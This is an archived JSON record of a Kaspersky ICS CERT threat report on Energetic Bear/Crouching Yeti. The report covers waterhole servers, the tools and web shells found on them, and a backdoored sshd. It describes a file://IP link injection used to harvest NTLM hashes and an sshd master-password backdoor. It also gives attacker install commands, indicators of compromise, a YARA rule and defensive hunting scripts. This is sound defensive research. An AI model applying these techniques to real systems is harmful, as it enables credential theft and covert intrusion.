{ "id": "b8db3552-309d-410a-ac6f-3a7e4b27cec1", "created_at": "2026-04-06T00:12:06.702623Z", "updated_at": "2026-04-10T03:32:49.927087Z", "deleted_at": null, "sha1_hash": "1d065e765e8733b8edc7709ebb8339a890abb149", "title": "Energetic Bear/Crouching Yeti: attacks on servers", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 481124, "plain_text": "Energetic Bear/Crouching Yeti: attacks on servers\r\nBy Kaspersky ICS CERT\r\nPublished: 2018-04-23 · Archived: 2026-04-05 17:44:20 UTC\r\nEnergetic Bear/Crouching Yeti is a widely known APT group active since at least 2010. The group tends to attack\r\ndifferent companies with a strong focus on the energy and industrial sectors. Companies attacked by Energetic\r\nBear/Crouching Yeti are geographically distributed worldwide with a more obvious concentration in Europe and\r\nthe US. In 2016-2017, the number of attacks on companies in Turkey increased significantly.\r\nThe main tactics of the group include sending phishing emails with malicious documents and infecting various\r\nservers. The group uses some of the infected servers for auxiliary purposes – to host tools and logs. Others are\r\ndeliberately infected to use them in waterhole attacks in order to reach the group’s main targets.\r\nRecent activity of the group against US organizations was discussed in a US-CERT advisory, which linked the\r\nactor to the Russian government, as well as an advisory by the UK National Cyber Security Centre.\r\nThis report by Kaspersky Lab ICS CERT presents information on identified servers that have been infected and\r\nused by the group. The report also includes the findings of an analysis of several webservers compromised by the\r\nEnergetic Bear group during 2016 and in early 2017.\r\nAttack victims\r\nThe table below shows the distribution of compromised servers (based on the language of website content and/or\r\nthe origins of the company renting the server at the time of compromise) by countries, attacked company types\r\nand the role of each server in the overall attack scheme. Victims of the threat actor’s attacks were not limited to\r\nindustrial companies.\r\nTable 1. Compromised servers\r\nCountry Description Role in the attack\r\nRussia Opposition political website Waterhole\r\nReal estate agency\r\nAuxiliary (collecting user data in the\r\nwaterhole attack)\r\nFootball club Waterhole\r\nDeveloper and integrator of secure automation\r\nsystems and IS consultant\r\nWaterhole\r\nDevelopers of software and equipment\r\nAuxiliary (collecting user data in the\r\nwaterhole attack, tool hosting)\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 1 of 15\n\nInvestment website\r\nAuxiliary (collecting user data in the\r\nwaterhole attack)\r\nUkraine\r\nElectric power sector company Waterhole\r\nBank Waterhole\r\nUK Aerospace company Waterhole\r\nGermany\r\nSoftware developer and integrator Waterhole\r\nUnknown\r\nAuxiliary (collecting user data in the\r\nwaterhole attack)\r\nTurkey\r\nOil and gas sector enterprise Waterhole\r\nIndustrial group Waterhole\r\nInvestment group Waterhole\r\nGreece Server of a university\r\nAuxiliary (collecting user data in the\r\nwaterhole attack)\r\nUSA Oil and gas sector enterprise Waterhole\r\nUnknown Affiliate network site\r\nAuxiliary (collecting user data in the\r\nwaterhole attack)\r\nWaterhole\r\nAll waterhole servers are infected following the same pattern: injecting a link into a web page or JS file with the\r\nfollowing file scheme: file://IP/filename.png.\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 2 of 15\n\nThe link is used to initiate a request for an image, as a result of which the user connects to the remote server over\r\nthe SMB protocol. In this attack type, the attackers’ goal is to extract the following data from the session:\r\nuser IP,\r\nuser name,\r\ndomain name,\r\nNTLM hash of the user’s password.\r\nIt should be noted that the image requested using the link is not physically located on the remote server.\r\nScanned resources\r\nCompromised servers are in some cases used to conduct attacks on other resources. In the process of analyzing\r\ninfected servers, numerous websites and servers were identified that the attackers had scanned with various tools,\r\nsuch as nmap, dirsearch, sqlmap, etc. (tool descriptions are provided below).\r\nTable 2. Resources that were scanned from one of the infected servers\r\nCountry\r\n(based on the\r\ncontent)\r\nDescription\r\nRussia Non-profit organization\r\nSale of drugs\r\nTravel/maps\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 3 of 15\n\nResources based on the Bump platform (platform for corporate social networks) – non-profit organization, social network for college/university alumni, communication\r\nplatform for NGOs, etc.\r\nBusiness – photographic studio\r\nIndustrial enterprise, construction company\r\nDoor manufacturing\r\nCryptocurrency exchange\r\nConstruction information and analysis portal\r\nPersonal website of a developer\r\nVainah Telecom IPs and Subnets (Chechen Republic)\r\nVarious Chechen resources (governmental organizations, universities, industrial\r\nenterprises, etc.)\r\nWeb server with numerous sites (alumni sites, sites of industrial and engineering\r\ncompanies, etc.)\r\nMuslim dating site\r\nBrazil Water treatment\r\nTurkey\r\nHotels\r\nEmbassy in Turkey\r\nSoftware developer\r\nAirport website\r\nCity council website\r\nCosmetics manufacturer\r\nReligious website\r\nTurktelekom subnet with a large number of sites\r\nTelnet Telecom subnet with a large number of sites\r\nGeorgia Personal website of a journalist\r\nKazakhstan Unknown web server\r\nUkraine Office supplies online store\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 4 of 15\n\nFloral business\r\nImage hosting service\r\nOnline course on sales\r\nDealer of farming equipment and spare parts\r\nUkrainian civil servant’s personal website\r\nOnline store of parts for household appliance repair\r\nTimber sales, construction\r\nTennis club website\r\nOnline store for farmers\r\nOnline store of massage equipment\r\nOnline clothes store\r\nWebsite development and promotion\r\nOnline air conditioner store\r\nSwitzerland Analytical company\r\nUS Web server with many domains\r\nFrance Web server with many domains\r\nVietnam Unknown server\r\nInternational Flight tracker\r\nThe sites and servers on this list do not seem to have anything in common. Even though the scanned servers do\r\nnot necessarily look like potential final victims, it is likely that the attackers scanned different resources to find a\r\nserver that could be used to establish a foothold for hosting the attackers’ tools and, subsequently, to develop the\r\nattack.\r\nPart of the sites scanned may have been of interest to the attackers as candidates for hosting waterhole resources.\r\nIn some cases, the domains scanned were hosted on the same server; sometimes the attackers went through the list\r\nof possible domains matching a given IP.\r\nIn most cases, multiple attempts to compromise a specific target were not identified – with the possible exception\r\nof sites on the Bump platform, flight tracker servers and servers of a Turkish hotel chain.\r\nCuriously, the sites scanned included a web developer’s website, kashey.ru, and resources links to which were\r\nfound on this site. These may have been links to resources developed by the site’s owner: www.esodedi.ru, www.i-https://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 5 of 15\n\nstroy.ru, www.saledoor.ru\r\nUtilities\r\nUtilities found on compromised servers are open-source and publicly available on GitHub:\r\nNmap – an open-source utility for analyzing the network and verifying its security.\r\nDirsearch — a simple command-line tool for brute forcing (performing exhaustive searches of) directories\r\nand files on websites.\r\nSqlmap — an open-source penetration testing tool, which automates the process of identifying and\r\nexploiting SQL injection vulnerabilities and taking over database servers.\r\nSublist3r — a tool written in Python designed to enumerate website subdomains. The tool uses open-source intelligence (OSINT). Sublist3r supports many different search engines, such as Google, Yahoo,\r\nBing, Baidu and Ask, as well as such services as Netcraft, Virustotal, ThreatCrowd, DNSdumpster and\r\nReverseDNS. The tool helps penetration testers to collect information on the subdomains of the domain\r\nthey are researching.\r\nWpscan — a WordPress vulnerability scanner that uses the blackbox principle, i.e., works without access\r\nto the source code. It can be used to scan remote WordPress sites in search of security issues.\r\nImpacket — a toolset for working with various network protocols, which is required by SMBTrap.\r\nSMBTrap — a tool for logging data received over the SMB protocol (user IP address, user name, domain\r\nname, password NTLM hash).\r\nCommix — a vulnerability search and command injection and exploitation tool written in Python.\r\nSubbrute – a subdomain enumeration tool available for Python and Windows that uses an open name\r\nresolver as a proxy and does not send traffic to the target DNS server.\r\nPHPMailer – a mail sending tool.\r\nIn addition, a custom Python script named ftpChecker.py was found on one of the servers. The script was designed\r\nto check FTP hosts from an incoming list.\r\nMalicious php files\r\nThe following malicious php files were found in different directories in the nginx folder and in a working\r\ndirectory created by the attackers on an infected web servers:\r\nFile name\r\nBrief\r\ndescription\r\nmd5sum\r\nTime of the latest\r\nfile change (MSK)\r\nSize,\r\nbytes\r\nini.php\r\nwso shell+\r\nmail\r\nf3e3e25a822012023c6e81b206711865\r\n2016-07-01\r\n15:57:38\r\n28786\r\nmysql.php\r\nwso shell+\r\nmail\r\nf3e3e25a822012023c6e81b206711865\r\n2016-06-12\r\n13:35:30\r\n28786\r\nopts.php wso shell c76470e85b7f3da46539b40e5c552712\r\n2016-06-12\r\n12:23:28\r\n36623\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 6 of 15\n\nerror_log.php wso shell 155385cc19e3092765bcfed034b82ccb\r\n2016-06-12\r\n10:59:39\r\n36636\r\ncode29.php web shell 1644af9b6424e8f58f39c7fa5e76de51\r\n2016-06-12\r\n11:10:40\r\n10724\r\nproxy87.php web shell 1644af9b6424e8f58f39c7fa5e76de51\r\n2016-06-12\r\n14:31:13\r\n10724\r\ntheme.php wso shell 2292f5db385068e161ae277531b2e114\r\n2017-05-16\r\n17:33:02\r\n133104\r\nsma.php PHPMailer 7ec514bbdc6dd8f606f803d39af8883f\r\n2017-05-19\r\n13:53:53\r\n14696\r\nmedia.php wso shell 78c31eff38fdb72ea3b1800ea917940f\r\n2017-04-17\r\n15:58:41\r\n1762986\r\nIn the table above:\r\nWeb shell is a script that allows remote administration of the machine.\r\nWSO is a popular web shell and file manager (it stands for “Web Shell by Orb”) that has the ability to\r\nmasquerade as an error page containing a hidden login form. It is available on GitHub:\r\nhttps://github.com/phpFileManager/WSO\r\nTwo of the PHP scripts found, ini.php and mysql.php, contained a WSO shell concatenated with the following\r\nemail spamming script:\r\nhttps://github.com/bediger4000/php-malware-analysis/tree/master/db-config.php\r\nAll the scripts found are obfuscated.\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 7 of 15\n\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 8 of 15\n\nOne of the web shells was found on the server under two different names (proxy87.php and code29.php). It uses\r\nthe eval function to execute a command sent via HTTP cookies or a POST request:\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 9 of 15\n\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 10 of 15\n\nModified sshd\r\nA modified sshd with a preinstalled backdoor was found in the process of analyzing the server.\r\nPatches with some versions of backdoors for sshd that are similar to the backdoor found are available on GitHub,\r\nfor example:\r\nhttps://github.com/jivoi/openssh-backdoor-kit\r\nCompilation is possible on any OS with binary compatibility.\r\nAs a result of replacing the original sshd file with a modified one on the infected server, an attacker can use a\r\n‘master password’ to get authorized on the remote server, while leaving minimal traces (compared to an ordinary\r\nuser connecting via ssh).\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 11 of 15\n\nIn addition, the modified sshd logs all legitimate ssh connections (this does not apply to the connection that uses\r\nthe ‘master password’), including connection times, account names and passwords. The log is encrypted and is\r\nlocated at /var/tmp/.pipe.sock.\r\nActivity of the attackers on compromised servers\r\nIn addition to using compromised servers to scan numerous resources, other attacker activity was also identified.\r\nAfter gaining access to the server, the attackers installed the tools they needed at different times. Specifically, the\r\nfollowing commands for third-party installations were identified on one of the servers:\r\napt install traceroute\r\napt-get install nmap\r\napt-get install screen\r\ngit clone https://github.com/sqlmapproject/sqlmap.git\r\nAdditionally, the attackers installed any packages and tools for Python they needed.\r\nThe diagram below shows times of illegitimate logons to one of the compromised servers during one month. The\r\nattackers checked the smbtrap log file on working days. In most cases, they logged on to the server at roughly the\r\nsame time of day, probably in the morning hours:\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 12 of 15\n\nIn addition, in the process of performing the analysis, an active process was identified that exploited SQL injection\r\nand collected data from a database of one of the victims.\r\nConclusion\r\nThe findings of the analysis of compromised servers and the attackers’ activity on these servers are as follows:\r\n1. 1 With rare exceptions, the group’s members get by with publicly available tools. The use of publicly\r\navailable utilities by the group to conduct its attacks renders the task of attack attribution without any\r\nadditional group ‘markers’ very difficult.\r\n2. 2 Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish\r\na foothold in order to develop further attacks against target facilities.\r\n3. 3 In most cases that we have observed, the group performed tasks related to searching for vulnerabilities,\r\ngaining persistence on various hosts, and stealing authentication data.\r\n4. 4 The diversity of victims may indicate the diversity of the attackers’ interests.\r\n5. 5 It can be assumed with some degree of certainty that the group operates in the interests of or takes orders\r\nfrom customers that are external to it, performing initial data collection, the theft of authentication data and\r\ngaining persistence on resources that are suitable for the attack’s further development.\r\nAppendix I – Indicators of Compromise\r\nFilenames and Paths\r\nTools*\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 13 of 15\n\n/usr/lib/libng/ftpChecker.py\r\n/usr/bin/nmap/\r\n/usr/lib/libng/dirsearch/\r\n/usr/share/python2.7/dirsearch/\r\n/usr/lib/libng/SMBTrap/\r\n/usr/lib/libng/commix/\r\n/usr/lib/libng/subbrute-master/\r\n/usr/share/python2.7/sqlmap/\r\n/usr/lib/libng/sqlmap-dev/\r\n/usr/lib/libng/wpscan/\r\n/usr/share/python2.7/wpscan/\r\n/usr/share/python2.7/Sublist3r/\r\n*Note that these tools can also be used by other threat actors.\r\nPHP files:\r\n/usr/share/python2.7/sma.php\r\n/usr/share/python2.7/theme.php\r\n/root/theme.php\r\n/usr/lib/libng/media.php\r\nLogs\r\n/var/tmp/.pipe.sock\r\nPHP file hashes\r\nf3e3e25a822012023c6e81b206711865\r\nc76470e85b7f3da46539b40e5c552712\r\n155385cc19e3092765bcfed034b82ccb\r\n1644af9b6424e8f58f39c7fa5e76de51\r\n2292f5db385068e161ae277531b2e114\r\n7ec514bbdc6dd8f606f803d39af8883f\r\n78c31eff38fdb72ea3b1800ea917940f\r\nYara rules\r\nrule Backdoored_ssh {\r\nstrings:\r\n$a1 = “OpenSSH”\r\n$a2 = “usage: ssh”\r\n$a3 = “HISTFILE”\r\ncondition:\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 14 of 15\n\nuint32(0) == 0x464c457f and filesize\u003c1000000 and all of ($a*)\r\n}\r\nShell script for Debian\r\ncd /tmp\r\nworkdir=428c5fcf495396df04a459e317b70ca2\r\nmkdir $workdir\r\ncd $workdir\r\nfind / -type d -iname smbtrap \u003e find-smbtrap.txt 2\u003e/dev/null\r\nfind / -type d -iname dirsearch \u003e find-dirsearch.txt 2\u003e/dev/null\r\nfind / -type d -iname nmap \u003e find-nmap.txt 2\u003e/dev/null\r\nfind / -type d -iname wpscan \u003e find-wpscan.txt 2\u003e/dev/null\r\nfind / -type d -iname sublist3r \u003e find-sublist3r.txt 2\u003e/dev/null\r\ndpkg -l | grep -E \\(impacket\\|pcapy\\|nmap\\) \u003e dpkg-grep.txt\r\ncp /var/lib/dpkg/info/openssh-server.md5sums . #retrieve initial hash for sshd\r\nmd5sum /usr/sbin/sshd \u003e sshd.md5sum #calculate actual hash for sshd\r\nShell script for Centos\r\ncd /tmp\r\nworkdir=428c5fcf495396df04a459e317b70ca2\r\nmkdir $workdir\r\ncd $workdir\r\nfind / -type d -iname smbtrap \u003e find-smbtrap.txt 2\u003e/dev/null\r\nfind / -type d -iname dirsearch \u003e find-dirsearch.txt 2\u003e/dev/null\r\nfind / -type d -iname nmap \u003e find-nmap.txt 2\u003e/dev/null\r\nfind / -type d -iname wpscan \u003e find-wpscan.txt 2\u003e/dev/null\r\nfind / -type d -iname sublist3r \u003e find-sublist3r.txt 2\u003e/dev/null\r\nrpm -qa | grep -E \\(impacket\\|pcapy\\|nmap\\) \u003e rpm-grep.txt\r\nrpm -qa –dump | grep ssh \u003e rpm-qa-dump.txt #retrieve initial hash for sshd\r\nsha256sum /usr/sbin/sshd \u003e sshd.sha256sum #calculate actual sha256 hash for sshd\r\nmd5sum /usr/sbin/sshd \u003e sshd.md5sum #calculate actual md5 hash for sshd\r\n Energetic Bear/Crouching Yeti: attacks on servers\r\nSource: https://securelist.com/energetic-bear-crouching-yeti/85345/\r\nhttps://securelist.com/energetic-bear-crouching-yeti/85345/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://securelist.com/energetic-bear-crouching-yeti/85345/" ], "report_names": [ "85345" ], "threat_actors": [ { "id": "649b5b3e-b16e-44db-91bc-ae80b825050e", "created_at": "2022-10-25T15:50:23.290412Z", "updated_at": "2026-04-10T02:00:05.257022Z", "deleted_at": null, "main_name": "Dragonfly", "aliases": [ "TEMP.Isotope", "DYMALLOY", "Berserk Bear", "TG-4192", "Crouching Yeti", "IRON LIBERTY", "Energetic Bear", "Ghost Blizzard" ], "source_name": "MITRE:Dragonfly", "tools": [ "MCMD", "Impacket", "CrackMapExec", "Backdoor.Oldrea", "Mimikatz", "PsExec", "Trojan.Karagany", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "1a76ed30-4daf-4817-98ae-87c667364464", "created_at": "2022-10-25T16:47:55.891029Z", "updated_at": "2026-04-10T02:00:03.646466Z", "deleted_at": null, "main_name": "IRON LIBERTY", "aliases": [ "ALLANITE ", "ATK6 ", "BROMINE ", "CASTLE ", "Crouching Yeti ", "DYMALLOY ", "Dragonfly ", "Energetic Bear / Berserk Bear ", "Ghost Blizzard ", "TEMP.Isotope ", "TG-4192 " ], "source_name": "Secureworks:IRON LIBERTY", "tools": [ "ClientX", "Ddex Loader", "Havex", "Karagany", "Loek", "MCMD", "Sysmain", "xfrost" ], "source_id": "Secureworks", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "5cbf6c32-482d-4cd2-9d11-0d9311acdc28", "created_at": "2023-01-06T13:46:38.39927Z", "updated_at": "2026-04-10T02:00:02.958273Z", "deleted_at": null, "main_name": "ENERGETIC BEAR", "aliases": [ "BERSERK BEAR", "ALLANITE", "Group 24", "Koala Team", "G0035", "ATK6", "ITG15", "DYMALLOY", "TG-4192", "Crouching Yeti", "Havex", "IRON LIBERTY", "Blue Kraken", "Ghost Blizzard" ], "source_name": "MISPGALAXY:ENERGETIC BEAR", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434326, "ts_updated_at": 1775791969, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1d065e765e8733b8edc7709ebb8339a890abb149.pdf", "text": "https://archive.orkl.eu/1d065e765e8733b8edc7709ebb8339a890abb149.txt", "img": "https://archive.orkl.eu/1d065e765e8733b8edc7709ebb8339a890abb149.jpg" } }